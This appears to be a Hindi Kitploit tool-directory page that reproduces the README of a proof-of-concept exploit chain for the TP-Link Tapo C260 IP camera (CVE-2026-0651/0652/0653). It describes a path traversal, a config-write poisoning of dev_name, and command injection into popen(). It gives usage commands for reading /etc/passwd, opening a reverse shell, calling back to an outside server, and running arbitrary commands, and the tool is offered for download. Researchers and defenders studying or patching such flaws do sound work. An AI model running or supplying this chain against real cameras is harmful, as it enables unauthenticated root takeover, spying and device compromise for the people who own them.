Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
tapo-c260-rce — PoC शोषण श्रृंखला TP-Link Tapo C260 कैमरे के लिए — CVE-2026-0651/0652/0653। @spaceraccoon द्वारा शोध। | Kitploit
उपकरण/GitHubGitHub/l0lsec/tapo-c260-rce
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणहार्डवेयर हैकिंगपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलहार्डवेयर और IoT सुरक्षाफर्मवेयर विश्लेषण
GitHubl0lsec/tapo-c260-rce
13116 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

tapo-c260-rce

PoC शोषण श्रृंखला TP-Link Tapo C260 कैमरे के लिए — CVE-2026-0651/0652/0653। @spaceraccoon द्वारा शोध।

रिपॉजिटरी देखें

Tapo C260 RCE चेन (CVE-2026-0651 / CVE-2026-0652 / CVE-2026-0653)

TP-Link Tapo C260 IP कैमरे के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट चेन जो तीन कमजोरियों को जोड़कर अनऑथेंटिकेटेड-से-रूट RCE प्राप्त करती है, जिन्हें Eugene Lim (Spaceraccoon) ने खोजा है।

श्रेय

सभी कमजोरी अनुसंधान और खोज Eugene Lim (@spaceraccoon) द्वारा की गई है।

यह रिपॉजिटरी उनके सार्वजनिक राइटअप पर आधारित एक PoC इम्प्लीमेंटेशन है। यदि आपको यह उपयोगी लगे, तो उनकी पुस्तक खरीदें: From Day Zero to Zero Day: A Hands-On Guide to Vulnerability Research (No Starch Press)।

कमजोरी चेन

CVEप्रकारप्रभाव
CVE-2026-0651पाथ ट्रैवर्सल / लोकल फाइल डिस्क्लोज़रHTTP GET हैंडलर में /%2e%2e%2f के माध्यम से मनमानी फाइलें पढ़ें
CVE-2026-0652मनमाना कॉन्फिग राइटक्लाउड API में JSON कुंजी हेरफेर के माध्यम से गेस्ट-स्तरीय उपयोगकर्ता किसी भी कॉन्फिग पथ पर लिख सकते हैं
CVE-2026-0653कमांड इंजेक्शन / प्रिविलेज एस्केलेशनset_region_code_handle बिना सैनिटाइज़ेशन के dev_name कॉन्फिग मान को popen() में पास करता है

किल चेन

root@kitploit:~
LFD (डिवाइस कॉन्फिग पढ़ें) --> कॉन्फिग राइट (dev_name को पॉइज़न करें) --> रीजन कोड हैंडलर ट्रिगर करें --> popen() --> शेल

आवश्यकताएँ

  • Python 3.8+
  • कैमरे तक नेटवर्क एक्सेस (LFD के लिए) या एक मान्य TP-Link क्लाउड ऑथ टोकन (RCE के लिए)
  • पूरी चेन के लिए गेस्ट-स्तरीय क्रेडेंशियल पर्याप्त हैं

इंस्टॉल

root@kitploit:~
git clone https://github.com/<you>/tapo-c260-rce.git
cd tapo-c260-rce
pip install -r requirements.txt

उपयोग

लोकल फाइल डिस्क्लोज़र (CVE-2026-0651)

लोकल नेटवर्क पर कैमरे से मनमानी फाइलें पढ़ें:

root@kitploit:~
python lfd.py --host 192.168.1.100 --token <stok_token> --file /etc/passwd

पूर्ण RCE चेन (CVE-2026-0651 + CVE-2026-0652 + CVE-2026-0653)

root@kitploit:~
# रिवर्स शेल
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --lhost <YOUR_IP> \
  --lport 4444

# केवल कॉलबैक (curl पिंग)
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --callback http://your-server.com/pwned

# कस्टम कमांड
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --cmd "id > /tmp/pwned"

यह कैसे काम करता है

  1. पॉइज़न — हेरफेर की गई JSON कुंजियों के साथ एक setLedStatus अनुरोध भेजता है जो डिवाइस पर tp_manage/info/dev_name कॉन्फिग पथ में एक शेल मेटाकैरेक्टर पेलोड लिखता है।

  2. ट्रिगर — एक set_region_code अनुरोध भेजता है। हैंडलर कॉन्फिग से dev_name पढ़ता है और इसे बिना सैनिटाइज़ेशन के popen() कॉल में इंटरपोलेट करता है, इंजेक्ट किए गए कमांड को निष्पादित करता है।

  3. शेल — हमलावर को कॉलबैक या रिवर्स शेल प्राप्त होता है।

प्रभावित फर्मवेयर

  • TP-Link Tapo C260 (पैच-पूर्व फर्मवेयर)
  • संभावित रूप से अन्य Tapo मॉडल जो समान /bin/main ऑम्निबस बाइनरी साझा करते हैं

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक दुरुपयोग के लिए जिम्मेदार नहीं हैं। किसी भी डिवाइस के खिलाफ परीक्षण करने से पहले हमेशा स्पष्ट अनुमति प्राप्त करें जो आपके स्वामित्व में नहीं है।

संदर्भ

  • मूल राइटअप — Spaceraccoon
  • Kennedn का Tapo प्रोटोकॉल अनुसंधान
  • TP-Link सुरक्षा सलाह
टूल डाउनलोड करें